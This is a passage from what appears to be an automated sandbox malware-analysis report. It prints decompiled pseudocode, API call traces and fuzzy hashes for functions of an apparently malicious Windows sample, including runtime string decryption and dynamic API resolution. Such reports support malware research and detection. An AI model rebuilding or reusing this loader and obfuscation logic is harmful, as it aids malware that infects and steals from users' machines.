							 *0x5ed118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E005EA734(_v12);
				}
				return _v24;
			}




























                                                          0x005e6c40
                                                          0x005e6c46
                                                          0x005e6c4d
                                                          0x005e6c53
                                                          0x005e6c57
                                                          0x005e6c5b
                                                          0x005e6c5e
                                                          0x005e6c63
                                                          0x005e6c68
                                                          0x005e6c6a
                                                          0x005e6c6a
                                                          0x005e6c73
                                                          0x005e6c78
                                                          0x005e6c7d
                                                          0x005e6c83
                                                          0x005e6c8d
                                                          0x005e6c96
                                                          0x005e6c9d
                                                          0x005e6cb6
                                                          0x005e6cbb
                                                          0x005e6cc0
                                                          0x005e6cc9
                                                          0x005e6cd2
                                                          0x005e6ce3
                                                          0x005e6cec
                                                          0x005e6cf0
                                                          0x005e6cf4
                                                          0x005e6cf9
                                                          0x005e6cfe
                                                          0x005e6d00
                                                          0x005e6d00
                                                          0x005e6d0a
                                                          0x005e6d13
                                                          0x005e6d1a
                                                          0x005e6d32
                                                          0x005e6d36
                                                          0x005e6d73
                                                          0x005e6d38
                                                          0x005e6d3b
                                                          0x005e6d43
                                                          0x005e6d54
                                                          0x005e6d60
                                                          0x005e6d68
                                                          0x005e6d6c
                                                          0x005e6d6c
                                                          0x005e6d36
                                                          0x005e6d7b
                                                          0x005e6d80
                                                          0x005e6d87

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 005E6C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 005E6C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 005E6C96
                                                          • lstrlen.KERNEL32(00000000), ref: 005E6C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 005E6CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 005E6D0A
                                                          • lstrlen.KERNEL32(?), ref: 005E6D13
                                                          • lstrlen.KERNEL32(?), ref: 005E6D1A
                                                          • lstrlenW.KERNEL32(?), ref: 005E6D21
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 56625aea8bea74919c283ecb2abdcdc482421988905d2ef7829c658a23b652ac
                                                          • Instruction ID: d795ece9aba2a70c32af5b5c331287733af4718ad286df52aa3fb0ff19de1f9c
                                                          • Opcode Fuzzy Hash: 56625aea8bea74919c283ecb2abdcdc482421988905d2ef7829c658a23b652ac
                                                          • Instruction Fuzzy Hash: A1419A72D0024AFBCF19AFA5CC4999EBFB5FF54354F010090E944AB221DB35EA54EBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E1BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E005E1BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x5ed2a8; // 0x107a5a8
				_t1 = _t9 + 0x5ee62c; // 0x253d7325
				_t36 = 0;
				_t28 = E005E173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E005EA71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E005E64EF(_t34, _t41, _a8);
						E005EA734(_t41);
						_t42 = E005E6467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E005EA734(_t36);
							_t36 = _t42;
						}
						_t43 = E005E17E5(_t36, _t33);
						if(_t43 != 0) {
							E005EA734(_t36);
							_t36 = _t43;
						}
					}
					E005EA734(_t28);
				}
				return _t36;
			}














                                                          0x005e1bb6
                                                          0x005e1bb9
                                                          0x005e1bba
                                                          0x005e1bc2
                                                          0x005e1bc9
                                                          0x005e1bd0
                                                          0x005e1bd4
                                                          0x005e1bda
                                                          0x005e1be1
                                                          0x005e1be6
                                                          0x005e1bf8
                                                          0x005e1bfc
                                                          0x005e1c00
                                                          0x005e1c06
                                                          0x005e1c0b
                                                          0x005e1c1b
                                                          0x005e1c1d
                                                          0x005e1c34
                                                          0x005e1c38
                                                          0x005e1c3b
                                                          0x005e1c40
                                                          0x005e1c40
                                                          0x005e1c49
                                                          0x005e1c4d
                                                          0x005e1c50
                                                          0x005e1c55
                                                          0x005e1c55
                                                          0x005e1c4d
                                                          0x005e1c58
                                                          0x005e1c58
                                                          0x005e1c63

                                                          APIs
                                                            • Part of subcall function 005E173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,005E1BD0,253D7325,00000000,00000000,7742C740,?,?,005E20C2,?), ref: 005E17A4
                                                            • Part of subcall function 005E173D: sprintf.NTDLL ref: 005E17C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,005E20C2,?,016695B0), ref: 005E1BE1
                                                          • lstrlen.KERNEL32(?,?,?,005E20C2,?,016695B0), ref: 005E1BE9
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • strcpy.NTDLL ref: 005E1C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 005E1C0B
                                                            • Part of subcall function 005E64EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,005E1C1A,00000000,?,?,?,005E20C2,?,016695B0), ref: 005E6506
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,005E20C2,?,016695B0), ref: 005E1C28
                                                            • Part of subcall function 005E6467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,005E1C34,00000000,?,?,005E20C2,?,016695B0), ref: 005E6471
                                                            • Part of subcall function 005E6467: _snprintf.NTDLL ref: 005E64CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: cbae2e66c64b0f25aba2284e2243831bccd8f9542ccd739a94b3c8fa533c7e71
                                                          • Instruction ID: 43d2e846c609ff15f1a4b607ad1620d7c99d04a763819630069a637bb8086e4d
                                                          • Opcode Fuzzy Hash: cbae2e66c64b0f25aba2284e2243831bccd8f9542ccd739a94b3c8fa533c7e71
                                                          • Instruction Fuzzy Hash: 251123375016A6678A1EBBB69C8DC6E3EADFE957603150015F6849B101CE38DC0697A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E6891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 005E68EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 005E68FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 005E6911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E6979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E6988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E6993
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 94a37dab6bb620de6009b73f3ce754b3aaaa2b298caf9c37b917d2c7a8535190
                                                          • Instruction ID: c9ce2d5cd533ee847716e363bc0d2fa4b31674a52329ff270f394329a04be1db
                                                          • Opcode Fuzzy Hash: 94a37dab6bb620de6009b73f3ce754b3aaaa2b298caf9c37b917d2c7a8535190
                                                          • Instruction Fuzzy Hash: 2241A036D00649AFDB05DFB9D848A9FBBBAFF88340F144425E950EB220DA71ED05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E592D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005E592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E005EA71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x5ed2a8; // 0x107a5a8
					_t1 = _t23 + 0x5ee11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x5ed2a8; // 0x107a5a8
					_t2 = _t26 + 0x5ee769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E005EA734(_t54);
					} else {
						_t30 =  *0x5ed2a8; // 0x107a5a8
						_t5 = _t30 + 0x5ee756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x5ed2a8; // 0x107a5a8
							_t7 = _t33 + 0x5ee40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x5ed2a8; // 0x107a5a8
								_t9 = _t36 + 0x5ee4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x5ed2a8; // 0x107a5a8
									_t11 = _t39 + 0x5ee779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E005E6604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x005e593c
                                                          0x005e5940
                                                          0x005e5a02
                                                          0x005e5946
                                                          0x005e5946
                                                          0x005e594b
                                                          0x005e595e
                                                          0x005e5960
                                                          0x005e5965
                                                          0x005e596d
                                                          0x005e5974
                                                          0x005e5976
                                                          0x005e597b
                                                          0x005e59fa
                                                          0x005e59fb
                                                          0x005e597d
                                                          0x005e597d
                                                          0x005e5982
                                                          0x005e598a
                                                          0x005e598c
                                                          0x005e5991
                                                          0x00000000
                                                          0x005e5993
                                                          0x005e5993
                                                          0x005e5998
                                                          0x005e59a0
                                                          0x005e59a2
                                                          0x005e59a7
                                                          0x00000000
                                                          0x005e59a9
                                                          0x005e59a9
                                                          0x005e59ae
                                                          0x005e59b6
                                                          0x005e59b8
                                                          0x005e59bd
                                                          0x00000000
                                                          0x005e59bf
                                                          0x005e59bf
                                                          0x005e59c4
                                                          0x005e59cc
                                                          0x005e59ce
                                                          0x005e59d3
                                                          0x00000000
                                                          0x005e59d5
                                                          0x005e59db
                                                          0x005e59e0
                                                          0x005e59e7
                                                          0x005e59ec
                                                          0x005e59f1
                                                          0x00000000
                                                          0x005e59f3
                                                          0x005e59f6
                                                          0x005e59f6
                                                          0x005e59f1
                                                          0x005e59d3
                                                          0x005e59bd
                                                          0x005e59a7
                                                          0x005e5991
                                                          0x005e597b
                                                          0x005e5a10

                                                          APIs
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,?,00000000,?,?,?,005E8EBD,?,00000001,?,?,00000000,00000000), ref: 005E5952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E5974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 005E598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 005E59A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 005E59B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 005E59CC
                                                            • Part of subcall function 005E6604: memset.NTDLL ref: 005E6683
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: d3cff721378755ae6a42eafd13756e686eeb5151de93043e5f26e513b456a934
                                                          • Instruction ID: 0e05c616468c014e2cabfedbd52e6a9d53727a85e42930ed9308489df63252b0
                                                          • Opcode Fuzzy Hash: d3cff721378755ae6a42eafd13756e686eeb5151de93043e5f26e513b456a934
                                                          • Instruction Fuzzy Hash: A0216BB450068AEFD728EF6ACC84D6ABBFCFF243447054166E585CB221E634E909CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E6F3A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 49%
                                                          			E005E6F3A(intOrPtr* __eax) {
				char _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_t1 =  &_v8; // 0x5e3a2e
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t3 =  &_v8; // 0x5e3a2e
					_t54 =  *_t3;
					_t103 =  *0x5ed2a8; // 0x107a5a8
					_t5 = _t103 + 0x5ee038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t6 =  &_v8; // 0x5e3a2e
					_t56 =  *_t6;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x5ec290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t21 =  &_v8; // 0x5e3a2e
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68, _t21);
												if(_t118 < 0) {
													goto L16;
												}
												_t26 =  &_v8; // 0x5e3a2e
												_t70 =  *_t26;
												_t109 =  *0x5ed2a8; // 0x107a5a8
												_t28 = _t109 + 0x5ee0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x5ed2a8; // 0x107a5a8
														_t33 = _t79 + 0x5ee078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t40 =  &_v8; // 0x5e3a2e
												_t72 =  *_t40;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x005e6f3f
                                                          0x005e6f45
                                                          0x005e6f49
                                                          0x005e6f4d
                                                          0x005e6f53
                                                          0x005e6f59
                                                          0x005e6f59
                                                          0x005e6f62
                                                          0x005e6f68
                                                          0x005e6f72
                                                          0x005e6f74
                                                          0x005e6f74
                                                          0x005e6f7a
                                                          0x005e6f7f
                                                          0x005e6f8a
                                                          0x005e6f90
                                                          0x005e6f95
                                                          0x005e70b7
                                                          0x005e6f9b
                                                          0x005e6f9b
                                                          0x005e6fa8
                                                          0x005e6fae
                                                          0x005e6fb4
                                                          0x005e6fb8
                                                          0x005e6fbe
                                                          0x005e6fcb
                                                          0x005e6fcf
                                                          0x005e6fd5
                                                          0x005e6fd8
                                                          0x005e6fe0
                                                          0x005e6fe1
                                                          0x005e6fe5
                                                          0x005e6fe9
                                                          0x005e6fec
                                                          0x005e6fef
                                                          0x005e6ff5
                                                          0x005e6ff5
                                                          0x005e6ffe
                                                          0x005e7004
                                                          0x005e7005
                                                          0x005e7008
                                                          0x005e7009
                                                          0x005e700a
                                                          0x005e7012
                                                          0x005e7013
                                                          0x005e7014
                                                          0x005e7016
                                                          0x005e701a
                                                          0x005e701e
                                                          0x00000000
                                                          0x00000000
                                                          0x005e7024
                                                          0x005e7024
                                                          0x005e702d
                                                          0x005e7033
                                                          0x005e703d
                                                          0x005e7041
                                                          0x005e7043
                                                          0x005e7050
                                                          0x005e7054
                                                          0x005e705c
                                                          0x005e7061
                                                          0x005e7073
                                                          0x005e7075
                                                          0x005e707b
                                                          0x005e707b
                                                          0x005e7084
                                                          0x005e7084
                                                          0x005e7086
                                                          0x005e708c
                                                          0x005e708c
                                                          0x005e708f
                                                          0x005e708f
                                                          0x005e7095
                                                          0x005e7098
                                                          0x005e70a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e70a1
                                                          0x005e6ff5
                                                          0x005e6fef
                                                          0x005e6fd8
                                                          0x005e70a7
                                                          0x005e70a7
                                                          0x005e70ad
                                                          0x005e70ad
                                                          0x005e70b3
                                                          0x005e70b3
                                                          0x005e70bc
                                                          0x005e70c2
                                                          0x005e70c2
                                                          0x005e6f7f
                                                          0x005e70cb

                                                          APIs
                                                          • SysAllocString.OLEAUT32(005EC290), ref: 005E6F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 005E706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E7084
                                                          • SysFreeString.OLEAUT32(?), ref: 005E70B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID: .:^
                                                          • API String ID: 1885612795-1692930162
                                                          • Opcode ID: dc5f30ae1297a4ec7e8df64686465041612b7554106c3bdc7b0786697b1c5fdc
                                                          • Instruction ID: f42b598da8dd8c0b1533ac443b639c8e56d2a58914101e29fef9f5ecb2301242
                                                          • Opcode Fuzzy Hash: dc5f30ae1297a4ec7e8df64686465041612b7554106c3bdc7b0786697b1c5fdc
                                                          • Instruction Fuzzy Hash: 80513D75D0055AEFCB05DFA8C88C9AEBBBAFF88704B144598E955EB220D7319D41CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E11EE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E005E11EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x5ed270; // 0xd448b889
				_t1 =  &_a4; // 0x5e3760
				_t32 =  *_t1;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x5ed2a8; // 0x107a5a8
				_t3 = _t8 + 0x5ee87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E005E38A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x5ed2ac, 1, 0, _t30);
					E005EA734(_t30);
				}
				_t12 =  *0x5ed25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E005EA65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E005E8EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x5ed10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E005EA273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                          0x005e11ef
                                                          0x005e11f6
                                                          0x005e11f6
                                                          0x005e1200
                                                          0x005e1204
                                                          0x005e120a
                                                          0x005e1219
                                                          0x005e1220
                                                          0x005e1224
                                                          0x005e1236
                                                          0x005e1238
                                                          0x005e1238
                                                          0x005e123d
                                                          0x005e1244
                                                          0x005e129b
                                                          0x005e129b
                                                          0x005e12a1
                                                          0x005e12a3
                                                          0x005e12a3
                                                          0x005e12ad
                                                          0x005e12b1
                                                          0x005e12c3
                                                          0x005e12c3
                                                          0x005e12c7
                                                          0x005e12cd
                                                          0x005e12cd
                                                          0x00000000
                                                          0x005e125d
                                                          0x005e1262
                                                          0x005e126a
                                                          0x005e126e
                                                          0x005e1272
                                                          0x005e1272
                                                          0x005e127f
                                                          0x005e1283
                                                          0x005e1287
                                                          0x005e12dc
                                                          0x005e12e2
                                                          0x005e12e2
                                                          0x005e1295
                                                          0x005e1299
                                                          0x005e12d0
                                                          0x005e12d2
                                                          0x005e12d5
                                                          0x005e12d5
                                                          0x00000000
                                                          0x005e12d2
                                                          0x005e1299
                                                          0x00000000
                                                          0x005e1283

                                                          APIs
                                                            • Part of subcall function 005E38A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,01669A98,00000000,?,?,63699BC3,00000005,005ED00C,?,?,005E5D30), ref: 005E38DE
                                                            • Part of subcall function 005E38A8: lstrcpy.KERNEL32(00000000,00000000), ref: 005E3902
                                                            • Part of subcall function 005E38A8: lstrcat.KERNEL32(00000000,00000000), ref: 005E390A
                                                          • CreateEventA.KERNEL32(005ED2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,005E3760,?,00000001,?), ref: 005E122F
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,`7^,00000000,00000000,?,00000000,?,005E3760,?,00000001,?,?,?,?,005E52AA), ref: 005E128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,005E3760,?,00000001,?), ref: 005E12BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,005E3760,?,00000001,?,?,?,?,005E52AA), ref: 005E12D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID: `7^
                                                          • API String ID: 73268831-2873282293
                                                          • Opcode ID: 3fd489991be8baeff6ba15d8e856e1ef83633cbdbc4b2b78c7d6b49a5e2f86d7
                                                          • Instruction ID: e222dcbcdb25154274b5d86426d1701951fa2edd8bb3171f63efaa6a9e9f0160
                                                          • Opcode Fuzzy Hash: 3fd489991be8baeff6ba15d8e856e1ef83633cbdbc4b2b78c7d6b49a5e2f86d7
                                                          • Instruction Fuzzy Hash: 7A214836A00BC15BC7395B7B8C88A6F7FA9FB95750B050614FBD6DB150DB31CC058698
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E486F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E005E486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E005EA71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x5ec284);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x5ec284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
